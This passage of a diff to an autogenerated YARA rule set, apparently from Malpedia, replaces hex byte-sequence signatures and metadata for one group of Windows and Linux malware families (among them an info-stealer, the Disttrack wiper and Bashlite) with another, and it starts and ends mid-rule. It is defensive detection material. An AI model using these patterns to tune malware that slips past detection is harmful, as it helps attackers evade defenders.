= { b901000000 85c9 741d 8b955ceaffff c1e206 81ca2bb0d5ca 03955ceaffff } - $sequence_4 = { 0b8dcce9ffff 898dcce9ffff e9???????? 8b95cce9ffff 69d237b0cb41 33c0 81fa237558e2 } - $sequence_5 = { 7353 8bc1 c1f805 8bf1 8d3c85004d4400 8b07 83e61f } - $sequence_6 = { 7e3e b8913b77ee 2b8508fdffff 398508fdffff 7c17 8b8d08fdffff c1e105 } - $sequence_7 = { 0f94c1 81c9efb286ac 7412 8b956cfcffff 039560fcffff 89956cfcffff c785acfcffffeed81864 } - $sequence_8 = { 894dec eb12 8b55f8 2b55ec 8955f8 8b45ec 83c001 } - $sequence_9 = { c1e009 05335b8425 2385e4e9ffff 0b85ece9ffff 8985ece9ffff 8b8de4e9ffff } + $sequence_0 = { 51 8d542458 52 e8???????? 8d44245c } + $sequence_1 = { 50 e8???????? 8d4c2404 6a01 51 e8???????? } + $sequence_2 = { 6a03 50 e8???????? 8b5c2448 8b0b 51 8d54243c } + $sequence_3 = { 68???????? 53 e8???????? 83c408 53 85c0 7440 } + $sequence_4 = { 85c0 750b 5b b8f9ffffff 5d 83c410 c3 } + $sequence_5 = { 8d442430 50 e8???????? 8d4c2434 68???????? 51 e8???????? } + $sequence_6 = { 50 50 8b44244c 50 6a00 6a00 56 } + $sequence_7 = { 0f8430020000 8d4c2404 51 e8???????? 8d542408 } + $sequence_8 = { e8???????? 8b1d???????? 83c428 50 ffd3 8b542430 } + $sequence_9 = { e8???????? 8d4c2408 6aff 51 e8???????? 8d542410 6a02 } condition: - 7 of them and filesize <573440 + 7 of them and filesize <139264 } -rule MALPEDIA_Win_Industrial_Spy_Auto : FILE +rule MALPEDIA_Win_Isr_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ce5f3e00-b3d5-5d7c-9715-f009f6dd4df1" + id = "f92134ff-d8ee-58cb-8cb8-468d7205306f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industrial_spy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.industrial_spy_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.isr_stealer_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "0d309a929b9f93d00c001ba14e0da1de3852467890493f029087eefa2710c99c" + logic_hash = "75691989209029cb7a637cf5df87a857ef3ef18b6fe3194f56cba1ecab86658c" score = 75 quality = 75 tags = "FILE" @@ -184934,34 +187730,34 @@ rule MALPEDIA_Win_Industrial_Spy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f7d1 8d9778a46ad7 23cb 448d8356b7c7e8 418bc3 4123c2 0bc8 } - $sequence_1 = { 8bc3 448bcf 410f104f10 4c8d442430 } - $sequence_2 = { 48895c2450 48895c2448 4883e804 4889442440 4533c9 4c8d442444 8b542440 } - $sequence_3 = { 8b5540 448b4544 4585ed 740f 899380000000 44898384000000 } - $sequence_4 = { 4c89742420 498bd4 498bcd c644043000 8d4301 0f11440430 410f104720 } - $sequence_5 = { 4881ec100e0000 4533e4 803d????????1f 7472 448925???????? } - $sequence_6 = { 837c8dc000 7508 ffca 4883e901 } - $sequence_7 = { 0f118424e8010000 f20f108424e0010000 f20f118424f8010000 0f108c24b8010000 0f118c2400020000 f20f108424c8010000 f20f11842410020000 } - $sequence_8 = { 4c8d4d50 895c2420 4c8d85a0030000 488d542430 488d4c2430 e8???????? } - $sequence_9 = { 0f8df5000000 e8???????? 488b8890000000 48399938010000 7516 488d05cb030100 } + $sequence_0 = { fb b05e 2bc1 e8???????? 661e } + $sequence_1 = { 08ac22c115978d 0e e8???????? 07 } + $sequence_2 = { 1c8b 53 2456 2bd1 807e6543 } + $sequence_3 = { 46 1e 301b 15c2c8c807 d6 12d8 } + $sequence_4 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e e8???????? } + $sequence_5 = { a7 8d16 b205 07 d32cb6 08ac22c115978d } + $sequence_6 = { 07 fb b05e 2bc1 e8???????? } + $sequence_7 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e } + $sequence_8 = { 07 d32cb6 08ac22c115978d 0e e8???????? } + $sequence_9 = { e8???????? 07 fb b05e 2bc1 e8???????? 661e } condition: - 7 of them and filesize <339968 + 7 of them and filesize <540672 } -rule MALPEDIA_Win_Gcleaner_Auto : FILE +rule MALPEDIA_Win_Disttrack_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6f27809a-4a1b-5d62-97c7-de2eeddc46d9" + id = "2e51f756-65a0-5587-a62f-f2956dec5749" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gcleaner_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.disttrack_auto.yar#L1-L264" license_url = "N/A" - logic_hash = "7aee09652b701d76a6e86128872cf2cc44b3fc03358e24bd02f64455f78cd161" + logic_hash = "ea5b03edf12e9b7619694e3ef0c115e1438e4209a3ddaae7b74afa494e3c57a2" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -184973,32 +187769,49 @@ rule MALPEDIA_Win_Gcleaner_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8d70feffff 8d45b0 0f4345b0 51 50 } - $sequence_1 = { 8bd0 c645fc04 8d4dd8 e8???????? 83c410 } - $sequence_2 = { 660fd64010 8345e418 eb10 8d4dc8 } - $sequence_3 = { 660fd64610 c742e000000000 c742e40f000000 c642d000 8b42e8 894618 } - $sequence_4 = { e8???????? 8d8d60ffffff e8???????? 6a00 6a00 } - $sequence_5 = { c642d000 8b42e8 894618 8d42ec 83c61c 3bc7 } - $sequence_6 = { eb10 8d4dc8 51 50 } - $sequence_7 = { 7438 8035????????2e 8035????????2e 8035????????2e 8035????????2e 8035????????2e 8035????????2e } - $sequence_8 = { 52 51 e8???????? 83c408 85ff 0f8807010000 } - $sequence_9 = { c645fc02 83fa10 722c 8b4dc8 42 8bc1 } + $sequence_0 = { 52 6a00 6a00 6848000700 } + $sequence_1 = { ff15???????? 5d 5b 8bc7 5f 5e } + $sequence_2 = { 68???????? ff15???????? 8d45dc 50 ff15???????? 8b4ddc } + $sequence_3 = { e8???????? 6a07 e8???????? 59 c3 6a10 } + $sequence_4 = { e8???????? 83c404 50 e8???????? 83c404 68???????? ff15???????? } + $sequence_5 = { 488bc8 e8???????? ebd1 498b94dca0940100 } + $sequence_6 = { 41bd08000000 4180fdfe 760d 488d0d392e0100 e8???????? } + $sequence_7 = { 7442 488d157a840000 488bcf e8???????? 85c0 7525 } + $sequence_8 = { 895c2440 895c2444 899c24d8000000 899c24b0000000 899c24b8000000 } + $sequence_9 = { 884c30ff 3bf3 72e6 8b75ec 6a00 } + $sequence_10 = { c3 8b04cd44ec4200 5d c3 0544ffffff } + $sequence_11 = { 57 4883ec20 488d0dc74a0100 e8???????? 48833d????????00 7510 488d0db14a0100 } + $sequence_12 = { 0fb7da 6683fa30 0f862b010000 8b44241c 33c9 66894c4422 66895c4420 } + $sequence_13 = { 885df3 8b4104 80781900 8bf9 7514 38580c } + $sequence_14 = { c7450800000000 e8???????? 68???????? 8d4df4 51 c745f46c924100 } + $sequence_15 = { e8???????? 03f0 56 e8???????? 83c404 c745fc00000000 } + $sequence_16 = { 51 ff15???????? 8b55d4 8955e4 8b45d8 } + $sequence_17 = { 8bc1 eb0c 0fb6c9 0fbe8968004200 } + $sequence_18 = { 8b4004 80781900 74ee 80791900 7505 8bc8 } + $sequence_19 = { 4533c0 498bd4 33c9 c744242800000008 895c2420 ff15???????? 85c0 } + $sequence_20 = { 75f9 2bc2 56 57 8d7801 } + $sequence_21 = { be01000000 4883630800 488d05cf450100 488903 488d4c2428 } + $sequence_22 = { 48634804 488d05b0270100 48894419e8 4883c430 } + $sequence_23 = { 52 50 68???????? ff15???????? 8d34f5b0044200 89442420 33ff } + $sequence_24 = { 7d13 4863ca 8a44191c 42888401602a0200 ffc2 ebe1 } + $sequence_25 = { 8d842498030000 64a300000000 8b4508 33db 89442430 } + $sequence_26 = { 3bc3 0f8476010000 68???????? 68???????? } condition: - 7 of them and filesize <540672 + 7 of them and filesize <1112064 } -rule MALPEDIA_Win_Punkey_Pos_Auto : FILE +rule MALPEDIA_Win_Dratzarus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "846510df-399c-5c73-991a-33d5b6390d78" + id = "3e7875e3-7e0c-5dea-9e90-8b6135466b8c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.punkey_pos_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dratzarus_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "afbb6da5e69098feb647a1b39faf19c917a9fcb87281ef711eecf3479b712e35" + logic_hash = "5f92bffb1ff676600291544ee9f45d8f2036c734b0601a5e03b740f618ff0f21" score = 75 quality = 75 tags = "FILE" @@ -185012,34 +187825,34 @@ rule MALPEDIA_Win_Punkey_Pos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd7 a3???????? 85c0 74ae 5f } - $sequence_1 = { 8bec 837d0c01 56 57 756b } - $sequence_2 = { 837d0c01 56 57 756b 8b4508 } - $sequence_3 = { ff15???????? 8bf0 85f6 7508 5f 33c0 5e } - $sequence_4 = { 33c0 5e 5d c20c00 8b3d???????? } - $sequence_5 = { 68e7070000 50 ff15???????? ff05???????? 8b0d???????? } - $sequence_6 = { 55 8bec 8b4508 85c0 7919 8b4d10 8b550c } - $sequence_7 = { 6a02 a3???????? ff15???????? a3???????? 33c0 } - $sequence_8 = { 52 50 a1???????? 50 ff15???????? 5d c20c00 } - $sequence_9 = { 8bf0 85f6 7508 5f 33c0 5e } + $sequence_0 = { 740a 488b1b 4885db 75c2 eb2f 8b8398010000 } + $sequence_1 = { f6c201 7403 66ffc3 66ffc0 6683f81a } + $sequence_2 = { e8???????? f20f5ef0 f20f1005???????? f20f2cd6 660f6eca 4863c2 488d0c40 } + $sequence_3 = { ff15???????? 488d4d68 ba13000000 488905???????? e8???????? } + $sequence_4 = { 488d8dc8000000 ba1c000000 488905???????? e8???????? 488bcb 488bd0 ff15???????? } + $sequence_5 = { 3c41 7c04 3c5a 7e08 3c30 7c19 3c39 } + $sequence_6 = { 6683f81a 72e3 0fb7c3 4883c420 } + $sequence_7 = { c745303ae47159 c7453474b06493 c745380897878b c6453c5b e8???????? 488bc8 } + $sequence_8 = { c7450f86f5e3e6 c74513a93633c4 c7451793554020 c7451b48549c39 c7451faaa5f9c7 } + $sequence_9 = { 488d4dc8 ba0c000000 488905???????? e8???????? 488bcb 488bd0 ff15???????? } condition: - 7 of them and filesize <499712 + 7 of them and filesize <1606656 } -rule MALPEDIA_Win_Unidentified_076_Auto : FILE +rule MALPEDIA_Win_Artra_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c76f9b8e-5a48-5b08-ae0b-831af19ce579" + id = "e3b6f047-fdc2-51fa-b830-434c73cd7acb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_076_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.artra_auto.yar#L1-L244" license_url = "N/A" - logic_hash = "afb3d60b25322ebd0dc1ef4a0c20812c54fa6c9c843b7734da080ace48ec2894" + logic_hash = "071975b61ff1770e71eaa8840068c294ba8aa67d37ecde4d3c9fbb80c75c80c8" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -185051,32 +187864,47 @@ rule MALPEDIA_Win_Unidentified_076_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488b5370 488d4520 488bcb 4889442420 e8???????? 8bc8 eb7c } - $sequence_1 = { 747b 8d5620 448bce 448bc5 33c9 ff97f8000000 48898748020000 } - $sequence_2 = { 488bcf ff9080000000 33d2 33c9 4c63c0 85c0 7e29 } - $sequence_3 = { 48894178 488b8f80000000 488b4618 48034f50 48898880000000 488b8f90000000 488b4618 } - $sequence_4 = { 458d6502 448bc7 488bce 4489642428 89442420 e8???????? 85c0 } - $sequence_5 = { 488d8d40150000 e8???????? 488d1587720000 488d8d14090000 8985d4000000 488d05c3130000 c7853001000000080000 } - $sequence_6 = { 4533c9 488bcf 448d420c 48895c2420 e8???????? eb05 bb01000000 } - $sequence_7 = { 7f0b 41b907000000 e9???????? 488b83c8000000 488b9360020000 488d8b5c060000 ff90f0070000 } - $sequence_8 = { 89442420 e8???????? eb56 83f801 7529 8b8714120000 448b8f10120000 } - $sequence_9 = { 415e 415c c3 817d0c08020000 7c05 458bcc eba2 } + $sequence_0 = { 8b442410 5f 5e 83c41c c21000 5f 33c0 } + $sequence_1 = { 5f 8a08 40 84c9 75f9 2bc2 880c30 } + $sequence_2 = { 75f9 2bc7 3bc8 72e3 8bc6 } + $sequence_3 = { 57 33c9 8d7801 8da42400000000 8a10 } + $sequence_4 = { 800431f3 8bc6 41 8d7801 } + $sequence_5 = { 72e3 8bc6 8d5001 5f 8a08 } + $sequence_6 = { 2bc2 03fb 8a4f01 47 } + $sequence_7 = { 85ff 0f8488000000 6a00 57 ff15???????? } + $sequence_8 = { 8b2d???????? 90 8b542410 8d4c2410 51 } + $sequence_9 = { 40 42 84c9 75f6 e8???????? } + $sequence_10 = { e8???????? 8b3d???????? 6a00 6a00 6a00 8d442414 50 } + $sequence_11 = { 57 ff15???????? 6a6d 56 ff15???????? 8bf0 } + $sequence_12 = { 6a00 8935???????? ff15???????? 8bf8 85ff 0f8488000000 } + $sequence_13 = { 8d442414 50 ffd7 85c0 7445 } + $sequence_14 = { 8b1d???????? 55 8b2d???????? 90 } + $sequence_15 = { 8a15???????? 8817 8d842484020000 8bc8 8bff 8a10 } + $sequence_16 = { e8???????? 8bce c644241800 e8???????? 8b47fc } + $sequence_17 = { c64424204d c644242161 c644242263 c644242368 c64424256e c644242665 c644242747 } + $sequence_18 = { 2bcd 8bfe 8d642400 8a1401 fec2 } + $sequence_19 = { 33c0 0fbe0c30 8d519f 83fa05 } + $sequence_20 = { be0c000000 8a1401 feca 8810 } + $sequence_21 = { ffd6 85c0 75cc 5d 5b 8b442410 } + $sequence_22 = { 83c40c 8b4508 8b7dfc 8be5 5d c3 33c0 } + $sequence_23 = { e8???????? 6a00 8d44242c 50 6a00 683f000f00 6a00 } + $sequence_24 = { 51 ffd6 85c0 7444 } condition: - 7 of them and filesize <114688 + 7 of them and filesize <811008 } -rule MALPEDIA_Win_Shadowhammer_Auto : FILE +rule MALPEDIA_Elf_Bashlite_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "194406b6-a98b-5404-b2f3-d5df631c65c0" + id = "ca6414ba-2b9c-5f1f-bb06-5810c9d01c02" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shadowhammer_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.bashlite_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "34aeb940c0c6ad0698f1f0e3ab023525d38575b33eb7ba408d437819a37427e5" + logic_hash = "38a010b68cee7bf4f221088e2245d1e5d0f927b085c409c35c3789c20373d434" score = 75 quality = 75 tags = "FILE" @@ -185090,32 +187918,32 @@ rule MALPEDIA_Win_Shadowhammer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 03d3 03f3 03fb 894dfc 8945f4 } - $sequence_1 = { c3 e8???????? c21000 8bff 55 8bec 833d????????01 } - $sequence_2 = { 8dbd7dfdffff ab ab ab ab } - $sequence_3 = { 58 6a2d 66894584 58 } - $sequence_4 = { 685ac1cbc2 56 e8???????? 59 59 85c0 } - $sequence_5 = { c78564ffffff103ee0fc c78568ffffffb0cf4161 c7856cffffffb0fafb19 8dbd70ffffff } - $sequence_6 = { 8d45e8 50 ff75fc 895de8 8b07 } - $sequence_7 = { c78544fdffff6a0ad740 c78548fdffff667aadbd 33c0 8dbd4cfdffff ab 889d50fdffff 8dbd51fdffff } - $sequence_8 = { 8dbdfcfdffff ab 889d00feffff 8dbd01feffff ab ab } - $sequence_9 = { 8945a8 8d8574ffffff 33ff 8945ac 8d45b8 } + $sequence_0 = { eb19 e8???????? c70016000000 e8???????? c70016000000 } + $sequence_1 = { 21d0 3345fc c9 c3 55 } + $sequence_2 = { 750c e8???????? 8b00 83f873 } + $sequence_3 = { 8b85ecefffff c9 c3 55 } + $sequence_4 = { 760f e8???????? c7001c000000 31c0 } + $sequence_5 = { 31c0 eb19 e8???????? c70016000000 } + $sequence_6 = { e8???????? 89c2 89d0 c1e81f 01d0 d1f8 } + $sequence_7 = { 85c0 750c c785ecefffff01000000 eb0a c785ecefffff00000000 } + $sequence_8 = { 85c0 750c c785ecefffff01000000 eb0a c785ecefffff00000000 8b85ecefffff } + $sequence_9 = { c785ecefffff01000000 eb0a c785ecefffff00000000 8b85ecefffff c9 c3 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <2310144 } -rule MALPEDIA_Win_Ployx_Auto : FILE +rule MALPEDIA_Win_Sykipot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7a9ae933-1e52-56f8-912b-cfaf3c1a4d79" + id = "6685d9d7-6a5e-5dd1-be8d-f9a06a5df784" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ployx_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sykipot_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "92d48577836748eb447c5a838f0c9893d40b34aa95d5979c4991a0399ec4439d" + logic_hash = "fc1ea45bf7dc961b3986859ea4bfe6fc9a7dfe7e53218e4f87e591fa79b5c1da" score = 75 quality = 75 tags = "FILE" @@ -185129,32 +187957,32 @@ rule MALPEDIA_Win_Ployx_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bc3 25ff000000 59 3bf0 59 7443 } - $sequence_1 = { 33db 897df8 e8???????? 397dfc 59 59 } - $sequence_2 = { 33ff 59 85c0 7e19 8bf0 8bfe 6a20 } - $sequence_3 = { 66ab ff35???????? aa 8d8588faffff 68???????? 50 } - $sequence_4 = { 8d3c78 8d0437 50 e8???????? 8b4d08 8d3c78 8d0437 } - $sequence_5 = { b9???????? b800020000 8d5f02 99 f7fb 47 8901 } - $sequence_6 = { 33ff 99 59 f7f9 8bc2 03c1 99 } - $sequence_7 = { 59 8945f4 0f848f000000 8d45e8 50 } - $sequence_8 = { e8???????? 83c40c 8d85a4fcffff 6a00 50 ff15???????? 8945e8 } - $sequence_9 = { 740f 3b7df8 7503 8975f8 57 } + $sequence_0 = { 8d8c2488000000 51 ffd5 68???????? 68???????? ffd3 83c408 } + $sequence_1 = { 56 c744246004000000 ffd7 8b4c244c 6a04 } + $sequence_2 = { 50 51 8bcd e8???????? 8b13 8d442414 52 } + $sequence_3 = { 50 8db42498000000 83ec44 8bfc } + $sequence_4 = { 5d b80e000000 5b 81c45c180000 c3 56 8b35???????? } + $sequence_5 = { 8bcc 8911 8b94244c060000 894104 895108 8bcd } + $sequence_6 = { 55 56 ff15???????? 85c0 57 7513 ff15???????? } + $sequence_7 = { bf???????? a3???????? f3ab b941000000 bf???????? f3ab b941000000 } + $sequence_8 = { 83ec44 b911000000 8db424e8000000 8bfc f3a5 8bcd e8???????? } + $sequence_9 = { c24800 8b442404 56 57 } condition: - 7 of them and filesize <229376 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Highnote_Auto : FILE +rule MALPEDIA_Win_Floxif_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9754f7b1-01be-5dce-8939-9dbedbd321d3" + id = "dcbc6afb-5640-594e-8001-abd00982f671" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.highnote_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.floxif_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "63e3b329a81995d654d7d4235beb319e224a0ea782f84de7ddd9bdcbead90225" + logic_hash = "0032adeaefefb80d7e1e935d3a462c453aec0c986c2f0bdf2924a1a8da50b164" score = 75 quality = 75 tags = "FILE" @@ -185168,32 +187996,32 @@ rule MALPEDIA_Win_Highnote_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b3a7 8cd7 a5 329ea1afa9a5 5d b5a5 } - $sequence_1 = { 2d620a682c fd 9d 8945ec 8945f0 8945f4 9c } - $sequence_2 = { 3665017cf341 14b0 63c5 ef d550 3362db } - $sequence_3 = { 0fb6c9 8a1408 0fb6da 03de 81e3ff000080 } - $sequence_4 = { 98 fd bfb47ea0c6 ddbb690cc1af 6595 fa 6a23 } - $sequence_5 = { 115542 305421f0 d438 bd4dae2b31 b1f7 } - $sequence_6 = { 90 9e a4 3634a1 6594 2424 e230 } - $sequence_7 = { 2ca7 33e6 7479 1e 0477 ed 7cb1 } - $sequence_8 = { 8636 35cfd6d703 b368 321e 4a 727d 51 } - $sequence_9 = { 000b 2920 da927a3741d4 7e5b a7 5a 40 } + $sequence_0 = { e8???????? 8945fc 837dfc02 7709 c745f401000000 eb09 8b45fc } + $sequence_1 = { 3955f4 0f83c9000000 68???????? e8???????? } + $sequence_2 = { 8b55fc c70200000000 8b45fc c7401000000000 8b45fc 8be5 } + $sequence_3 = { c645e500 c645e6e1 c645e700 c645e87d c645e973 c645ea7a c645eb30 } + $sequence_4 = { c645e500 c645e6bb c645e700 c645e828 c645e92b c645ea23 } + $sequence_5 = { 7505 e9???????? 837dd800 7406 837dd805 7502 eb92 } + $sequence_6 = { 83ec14 894df8 8b45f8 8b4808 } + $sequence_7 = { ebaa 8d4d08 e8???????? 3945fc 7526 8d4d18 e8???????? } + $sequence_8 = { 8b55fc 837a0400 7507 e8???????? eb11 8b4dfc e8???????? } + $sequence_9 = { e8???????? e8???????? 83c410 eb44 83ec10 8bcc 8d5508 } condition: - 7 of them and filesize <321536 + 7 of them and filesize <352256 } -rule MALPEDIA_Win_Rctrl_Auto : FILE +rule MALPEDIA_Win_Goggles_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "60ae096f-d5f7-57d0-b6f9-cb53f8d1b760" + id = "5a06c6e9-c0df-5eb2-9be8-0912ecacc960" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rctrl_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.goggles_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "0c64a52ce76fbe6b25b4079783722f9c8bfa120e4543946e41c97eea8cb03d4d" + logic_hash = "6adf86a94e27e4da9bbef6eb899bde95be7c68b8b1a213561e769f61dd93d169" score = 75 quality = 75 tags = "FILE" @@ -185207,32 +188035,32 @@ rule MALPEDIA_Win_Rctrl_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 85c0 0f8440030000 8b10 8bc8 ff520c 83c010 } - $sequence_1 = { 8bf0 56 6a00 6a00 ff15???????? 33c9 894508 } - $sequence_2 = { 6a06 e8???????? cc b8???????? c3 55 8bec } - $sequence_3 = { 8b473c 8985d4feffff e8???????? 85c0 0f85ef000000 814f2400000400 8b85d8feffff } - $sequence_4 = { 33c0 40 8be5 5d c20800 6a14 b8???????? } - $sequence_5 = { 898368040000 03c8 83bd7cffffff00 7433 8b855cffffff 8db328040000 03c1 } - $sequence_6 = { 75cc 8d4dc8 e8???????? e9???????? e8???????? ffb6f8000000 e8???????? } - $sequence_7 = { ff750c 8bd6 e8???????? 8b4518 8d0c3e 8d1400 } - $sequence_8 = { 85c0 0f94c0 84c0 7423 6a00 6a00 57 } - $sequence_9 = { ff7008 ff75f0 e8???????? 8bf0 eb02 } + $sequence_0 = { c1fa02 83e23f 8a8a10400010 880c33 } + $sequence_1 = { 51 e8???????? 8b1d???????? b941000000 33c0 } + $sequence_2 = { 8d54247c 51 52 8d842488010000 68???????? 50 } + $sequence_3 = { 6a01 51 ff15???????? 8b742430 8b542431 } + $sequence_4 = { 53 ff15???????? 83c414 33c0 85ed } + $sequence_5 = { 51 ff15???????? 83c9ff bf???????? 33c0 83c414 } + $sequence_6 = { c744241002000000 8d8c2480020000 51 ff15???????? 8b442410 5f 5e } + $sequence_7 = { ffd5 8bf0 8bc7 99 f77c242c 81ee???????? 0fbe8288410010 } + $sequence_8 = { 2bd6 56 57 03ea ffd3 57 } + $sequence_9 = { a0???????? 55 57 88442410 } condition: - 7 of them and filesize <4315136 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Play_Auto : FILE +rule MALPEDIA_Win_Cueisfry_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e5dc4ad0-4963-56ca-a5e5-83aec2390f77" + id = "7fd15319-e895-59d1-bc47-6c7854fd0773" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.play" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.play_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cueisfry_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "633aef027703dbbff9f2f212af038ee3039813400893deac0150b99c35143631" + logic_hash = "312c24021c3e8bf9c6e0d5e58840583a4541e92e9f141ae7391f901c409f9736" score = 75 quality = 75 tags = "FILE" @@ -185246,34 +188074,34 @@ rule MALPEDIA_Win_Play_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb78d82feffff 2bc8 899570ffffff 014d84 } - $sequence_1 = { 02c1 c645c5ae 8845c3 b937030000 888556ffffff 8a45c7 c6852fffffff00 } - $sequence_2 = { 8bd8 899d88fdffff 85db 0f8483040000 8a0b 80f9e9 7409 } - $sequence_3 = { c83dad3c d92b e00c 9c 0d05f0657b 4e f30f7e05???????? } - $sequence_4 = { 7f06 81c4ab000000 83c410 e8???????? 66f1 } - $sequence_5 = { a1???????? 8945bc a1???????? 0f11855cffffff 894594 f30f7e05???????? 8b45f8 } - $sequence_6 = { 91 ae 54 ce 3106 f77cf30f 7e05 } - $sequence_7 = { 8955f4 8b460c 83ec08 8d0488 8945f8 8d45f4 } - $sequence_8 = { 898d48fdffff 66898562fdffff 668985e6fcffff 66398d30fdffff 7634 66ff857cfcffff 8d0432 } - $sequence_9 = { 88852effffff 8b8548ffffff fec8 8855ad 88854dffffff 8d45e8 6689bd0cfeffff } + $sequence_0 = { ff15???????? b8???????? c3 8b45ec c745fcffffffff 85c0 7406 } + $sequence_1 = { f3a5 52 e8???????? 8d44241c } + $sequence_2 = { e8???????? 85c0 750c 55 ff15???????? e9???????? } + $sequence_3 = { 8944241c 7c0d 80f95a 7f08 0fbee9 } + $sequence_4 = { 8975dc e8???????? 8b45ec 3bc7 750d } + $sequence_5 = { 